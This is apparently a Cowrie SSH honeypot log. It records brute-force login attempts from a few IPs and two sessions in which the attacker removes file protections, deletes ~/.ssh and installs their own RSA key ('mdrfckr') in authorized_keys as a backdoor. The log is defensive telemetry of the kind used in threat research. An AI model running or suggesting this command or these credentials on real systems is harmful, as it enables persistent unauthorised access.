{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38642,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac4749c5bf47","protocol":"ssh","message":"New connection: 212.227.235.229:38642 (1.2.3.4:22) [session: ac4749c5bf47]","sensor":"my-vps","timestamp":"2025-08-26T23:27:31.494702Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T23:27:31.495443Z","src_ip":"212.227.235.229","session":"ac4749c5bf47"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T23:27:31.703737Z","src_ip":"212.227.235.229","session":"ac4749c5bf47"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T23:27:32.579043Z","src_ip":"212.227.235.229","session":"ac4749c5bf47"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:27:33.790341Z","src_ip":"212.227.235.229","session":"ac4749c5bf47"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38658,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a34933c4827","protocol":"ssh","message":"New connection: 212.227.235.229:38658 (1.2.3.4:22) [session: 1a34933c4827]","sensor":"my-vps","timestamp":"2025-08-26T23:27:33.999345Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T23:27:34.000392Z","src_ip":"212.227.235.229","session":"1a34933c4827"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T23:27:34.208162Z","src_ip":"212.227.235.229","session":"1a34933c4827"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T23:27:35.081675Z","src_ip":"212.227.235.229","session":"1a34933c4827"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:27:35.291666Z","src_ip":"212.227.235.229","session":"1a34933c4827"}
{"eventid":"cowrie.session.closed","duration":"6.5","message":"Connection lost after 6.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:27:35.297024Z","src_ip":"212.227.235.229","session":"ee2a89038492"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55568,"dst_ip":"1.2.3.4","dst_port":22,"session":"54b2bc0ba29d","protocol":"ssh","message":"New connection: 217.72.205.35:55568 (1.2.3.4:22) [session: 54b2bc0ba29d]","sensor":"my-vps","timestamp":"2025-08-26T23:27:38.435560Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:27:38.436840Z","src_ip":"217.72.205.35","session":"54b2bc0ba29d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49462,"dst_ip":"1.2.3.4","dst_port":22,"session":"4bc3f876c419","protocol":"ssh","message":"New connection: 212.227.235.229:49462 (1.2.3.4:22) [session: 4bc3f876c419]","sensor":"my-vps","timestamp":"2025-08-26T23:28:55.171433Z"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:28:55.509252Z","src_ip":"212.227.235.229","session":"4bc3f876c419"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41072,"dst_ip":"1.2.3.4","dst_port":22,"session":"2577af7dbc94","protocol":"ssh","message":"New connection: 212.227.235.229:41072 (1.2.3.4:22) [session: 2577af7dbc94]","sensor":"my-vps","timestamp":"2025-08-26T23:28:56.227108Z"}
{"eventid":"cowrie.client.version","version":"","message":"Remote SSH version: ","sensor":"my-vps","timestamp":"2025-08-26T23:28:56.231007Z","src_ip":"212.227.235.229","session":"2577af7dbc94"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:28:56.231974Z","src_ip":"212.227.235.229","session":"2577af7dbc94"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41092,"dst_ip":"1.2.3.4","dst_port":22,"session":"853fe84a0b14","protocol":"ssh","message":"New connection: 212.227.235.229:41092 (1.2.3.4:22) [session: 853fe84a0b14]","sensor":"my-vps","timestamp":"2025-08-26T23:28:57.733742Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-08-26T23:28:57.734731Z","src_ip":"212.227.235.229","session":"853fe84a0b14"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:28:57.735466Z","src_ip":"212.227.235.229","session":"853fe84a0b14"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47650,"dst_ip":"1.2.3.4","dst_port":22,"session":"a1d47ff8cc96","protocol":"ssh","message":"New connection: 212.227.235.229:47650 (1.2.3.4:22) [session: a1d47ff8cc96]","sensor":"my-vps","timestamp":"2025-08-26T23:29:03.657528Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T23:29:03.658459Z","src_ip":"212.227.235.229","session":"a1d47ff8cc96"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T23:29:03.943816Z","src_ip":"212.227.235.229","session":"a1d47ff8cc96"}
{"eventid":"cowrie.login.success","username":"root","password":"serveur","message":"login attempt [root/serveur] succeeded","sensor":"my-vps","timestamp":"2025-08-26T23:29:05.125249Z","src_ip":"212.227.235.229","session":"a1d47ff8cc96"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T23:29:05.713110Z","src_ip":"212.227.235.229","session":"a1d47ff8cc96"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T23:29:05.713765Z","src_ip":"212.227.235.229","session":"a1d47ff8cc96"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T23:29:05.714828Z","src_ip":"212.227.235.229","session":"a1d47ff8cc96"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:29:06.000494Z","src_ip":"212.227.235.229","session":"a1d47ff8cc96"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T23:29:06.672352Z","src_ip":"212.227.235.229","session":"a1d47ff8cc96"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T23:29:06.673213Z","src_ip":"212.227.235.229","session":"a1d47ff8cc96"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T23:29:06.960917Z","src_ip":"212.227.235.229","session":"a1d47ff8cc96"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:29:06.961854Z","src_ip":"212.227.235.229","session":"a1d47ff8cc96"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47652,"dst_ip":"1.2.3.4","dst_port":22,"session":"190dd53b482f","protocol":"ssh","message":"New connection: 212.227.235.229:47652 (1.2.3.4:22) [session: 190dd53b482f]","sensor":"my-vps","timestamp":"2025-08-26T23:29:07.240290Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T23:29:07.241312Z","src_ip":"212.227.235.229","session":"190dd53b482f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T23:29:07.521373Z","src_ip":"212.227.235.229","session":"190dd53b482f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T23:29:08.682401Z","src_ip":"212.227.235.229","session":"190dd53b482f"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:29:09.965432Z","src_ip":"212.227.235.229","session":"190dd53b482f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47668,"dst_ip":"1.2.3.4","dst_port":22,"session":"a7a8be05fe5b","protocol":"ssh","message":"New connection: 212.227.235.229:47668 (1.2.3.4:22) [session: a7a8be05fe5b]","sensor":"my-vps","timestamp":"2025-08-26T23:29:10.240572Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T23:29:10.241468Z","src_ip":"212.227.235.229","session":"a7a8be05fe5b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T23:29:10.516109Z","src_ip":"212.227.235.229","session":"a7a8be05fe5b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37778,"dst_ip":"1.2.3.4","dst_port":22,"session":"5252d695ed43","protocol":"ssh","message":"New connection: 212.227.125.160:37778 (1.2.3.4:22) [session: 5252d695ed43]","sensor":"my-vps","timestamp":"2025-08-26T23:29:11.151850Z"}
{"eventid":"cowrie.client.version","version":"","message":"Remote SSH version: ","sensor":"my-vps","timestamp":"2025-08-26T23:29:11.153186Z","src_ip":"212.227.125.160","session":"5252d695ed43"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:29:11.154019Z","src_ip":"212.227.125.160","session":"5252d695ed43"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T23:29:11.657734Z","src_ip":"212.227.235.229","session":"a7a8be05fe5b"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:29:11.933687Z","src_ip":"212.227.235.229","session":"a1d47ff8cc96"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:29:11.934824Z","src_ip":"212.227.235.229","session":"a7a8be05fe5b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37834,"dst_ip":"1.2.3.4","dst_port":22,"session":"c4aaa4102a39","protocol":"ssh","message":"New connection: 212.227.125.160:37834 (1.2.3.4:22) [session: c4aaa4102a39]","sensor":"my-vps","timestamp":"2025-08-26T23:29:14.610098Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-08-26T23:29:14.611001Z","src_ip":"212.227.125.160","session":"c4aaa4102a39"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:29:14.612517Z","src_ip":"212.227.125.160","session":"c4aaa4102a39"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40048,"dst_ip":"1.2.3.4","dst_port":22,"session":"13da6f412365","protocol":"ssh","message":"New connection: 212.227.235.229:40048 (1.2.3.4:22) [session: 13da6f412365]","sensor":"my-vps","timestamp":"2025-08-26T23:29:21.979260Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T23:29:21.980022Z","src_ip":"212.227.235.229","session":"13da6f412365"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T23:29:22.332551Z","src_ip":"212.227.235.229","session":"13da6f412365"}
{"eventid":"cowrie.login.success","username":"root","password":"Bx@123456","message":"login attempt [root/Bx@123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T23:29:23.749731Z","src_ip":"212.227.235.229","session":"13da6f412365"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T23:29:24.517187Z","src_ip":"212.227.235.229","session":"13da6f412365"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T23:29:24.517879Z","src_ip":"212.227.235.229","session":"13da6f412365"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T23:29:24.518767Z","src_ip":"212.227.235.229","session":"13da6f412365"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:29:24.873322Z","src_ip":"212.227.235.229","session":"13da6f412365"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T23:29:25.601035Z","src_ip":"212.227.235.229","session":"13da6f412365"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T23:29:25.601765Z","src_ip":"212.227.235.229","session":"13da6f412365"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T23:29:25.957331Z","src_ip":"212.227.235.229","session":"13da6f412365"}
